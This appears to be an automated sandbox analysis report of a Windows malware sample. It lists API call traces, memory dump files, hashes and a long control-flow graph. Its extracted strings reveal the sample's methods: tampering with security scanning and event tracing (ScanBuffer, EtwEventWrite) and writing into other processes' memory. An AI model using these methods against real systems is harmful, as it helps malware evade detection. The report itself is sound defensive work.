                                                                                                                                • ResumeThread.KERNEL32(00000000,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8), ref: 02A28D33
                                                                                                                                • CloseHandle.KERNEL32(00000000,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,00000000,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380), ref: 02A28EB2
                                                                                                                                  • Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
                                                                                                                                  • Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
                                                                                                                                  • Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6
                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A87380,02A2B7B8,UacInitialize,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380), ref: 02A292A4
                                                                                                                                  • Part of subcall function 02A07E5C: GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67
                                                                                                                                  • Part of subcall function 02A1DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DD5E), ref: 02A1DCCB
                                                                                                                                  • Part of subcall function 02A1DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A1DD05
                                                                                                                                  • Part of subcall function 02A1DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A1DD32
                                                                                                                                  • Part of subcall function 02A1DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A1DD3B
                                                                                                                                  • Part of subcall function 02A18338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A183C2), ref: 02A183A4
                                                                                                                                • ExitProcess.KERNEL32(00000000,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,Initialize,02A87380,02A2B7B8,00000000,00000000,00000000,ScanString,02A87380,02A2B7B8), ref: 02A2B2FA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                • API String ID: 2769005614-3738268246
                                                                                                                                • Opcode ID: 3fde42e66b9e3b56c6640c66aa0f3868b0efd1138c065e1296cf5fbffc353963
                                                                                                                                • Instruction ID: 36edae71f4ae463c9f2d4779583ee4fc043ed7364d67feaf933e6182e2a3eb8b
                                                                                                                                • Opcode Fuzzy Hash: 3fde42e66b9e3b56c6640c66aa0f3868b0efd1138c065e1296cf5fbffc353963
                                                                                                                                • Instruction Fuzzy Hash: 2E43FC35A8416CDBDB10EB68EDC0ADE73BAFF88344F1045E6A1099B254DE30AE95CF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 7740 2a23e12-2a25525 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1f094 call 2a04860 call 2a049a0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1e358 call 2a04de0 call 2a04764 call 2a04de0 call 2a1dc8c Sleep call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a188b8 call 2a049a0 call 2a03244 call 2a1e678 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 Sleep call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a17c10 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a17c10 call 2a1894c call 2a188b8 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1e358 call 2a04de0 call 2a04764 call 2a04de0 call 2a1dc8c call 2a188b8 call 2a1f094 call 2a047ec call 2a049a0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a188b8 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a188b8 call 2a1e358 call 2a04de0 call 2a04764 call 2a04de0 call 2a1dc8c call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a188b8 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 Sleep call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a049a0 call 2a04d74 call 2a1dc04 call 2a049a0 call 2a04d74 call 2a1dc04 call 2a049a0 call 2a04d74 call 2a1dc04 call 2a049a0 call 2a04d74 call 2a1dc04 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04d74 call 2a1dc04 call 2a04d74 call 2a1dc04 call 2a04d74 8425 2a25530-2a25b02 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1e398 call 2a04530 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a07acc call 2a1f16c call 2a04530 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1f094 call 2a1f108 call 2a04530 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 7740->8425 8426 2a2552b call 2a1dc04 7740->8426 8596 2a25b07-2a25d82 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 8425->8596 8426->8425 8669 2a27568-2a277e3 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 8596->8669 8670 2a25d88-2a25dcd call 2a04860 call 2a049a0 call 2a046d4 call 2a07e5c 8596->8670 8815 2a28318-2a28517 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 8669->8815 8816 2a277e9-2a27e3b call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a047ec call 2a049a0 call 2a185bc call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a049a0 call 2a046d4 call 2a1adf8 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a036d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 8669->8816 8670->8669 8688 2a25dd3-2a264db call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 8670->8688 9339 2a264e0-2a264e1 call 2a185bc 8688->9339 8994 2a293a1-2a29524 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 8815->8994 8995 2a2851d-2a286f0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a047ec call 2a049a0 call 2a04d74 call 2a04df0 CreateProcessAsUserW 8815->8995 9582 2a27e42-2a28104 call 2a15aec call 2a04bcc call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a049f8 call 2a17e50 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1b118 8816->9582 9583 2a27e3d-2a27e40 8816->9583 9173 2a29cf5-2a29d60 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 8994->9173 9174 2a2952a-2a29539 call 2a048ec 8994->9174 9206 2a286f2-2a28769 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 8995->9206 9207 2a2876e-2a28879 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 8995->9207 9240 2a29d65-2a29d6c call 2a189d0 9173->9240 9174->9173 9188 2a2953f-2a29812 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1f094 call 2a04860 call 2a049a0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a07e5c 9174->9188 9607 2a29818-2a29ade call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1e358 call 2a04530 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04de0 * 2 call 2a04764 9188->9607 9608 2a29aef-2a29b5a call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 9188->9608 9206->9207 9365 2a28880-2a28ba0 call 2a049f8 call 2a1de50 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1d164 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 9207->9365 9366 2a2887b-2a2887e 9207->9366 9252 2a29d71-2a2a0cb call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 9240->9252 9798 2a2a0d0-2a2a0d7 call 2a189d0 9252->9798 9349 2a264e6-2a26551 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 9339->9349 9410 2a26556-2a2655d call 2a189d0 9349->9410 9898 2a28ba2-2a28bb4 call 2a18730 9365->9898 9899 2a28bb9-2a292c0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 ResumeThread call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 CloseHandle call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18080 call 2a1894c * 6 CloseHandle 9365->9899 9366->9365 9420 2a26562-2a266e5 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 9410->9420 9653 2a266eb-2a26938 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a04d74 call 2a04de0 call 2a04764 9420->9653 9654 2a26949-2a269b4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 9420->9654 10132 2a28109-2a28120 call 2a03700 9582->10132 9583->9582 10136 2a29ae3-2a29aea call 2a1dc8c 9607->10136 9686 2a29b5f-2a29b66 call 2a189d0 9608->9686 10102 2a2693d-2a26944 call 2a1dc8c 9653->10102 9732 2a269b9-2a269c0 call 2a189d0 9654->9732 9700 2a29b6b-2a29ce4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a049f8 9686->9700 10009 2a29ce9-2a29cf0 call 2a18d70 9700->10009 9750 2a269c5-2a27040 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a036d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a02f08 call 2a07990 call 2a047ec call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a02f08 call 2a07990 call 2a047ec call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 9732->9750 10514 2a27045-2a27052 call 2a14dd4 9750->10514 9812 2a2a0dc-2a2a0fe call 2a046d4 * 2 9798->9812 9841 2a2a103-2a2a10a call 2a189d0 9812->9841 9856 2a2a10f-2a2a131 call 2a046d4 * 2 9841->9856 9882 2a2a136-2a2a13d call 2a189d0 9856->9882 9896 2a2a142-2a2a164 call 2a046d4 * 2 9882->9896 9926 2a2a169-2a2a170 call 2a189d0 9896->9926 9898->9899 10586 2a292c5-2a2939c call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 9899->10586 9940 2a2a175-2a2a197 call 2a046d4 * 2 9926->9940 9970 2a2a19c-2a2a1a3 call 2a189d0 9940->9970 9981 2a2a1a8-2a2a213 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 9970->9981 10061 2a2a218-2a2a21f call 2a189d0 9981->10061 10009->9173 10073 2a2a224-2a2a469 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 